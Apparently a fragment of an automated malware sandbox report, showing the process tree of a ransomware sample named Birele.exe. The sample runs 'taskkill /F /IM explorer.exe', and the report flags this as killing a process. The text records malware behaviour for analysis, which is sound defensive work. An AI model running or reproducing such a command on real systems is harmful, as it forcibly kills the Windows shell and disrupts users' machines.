                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6924
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Birele.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Ransomware\Birele.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:7044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  taskkill /F /IM explorer.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:7272

                                                                                                                                                                                                                                                                                                                                                                                                                                                              Network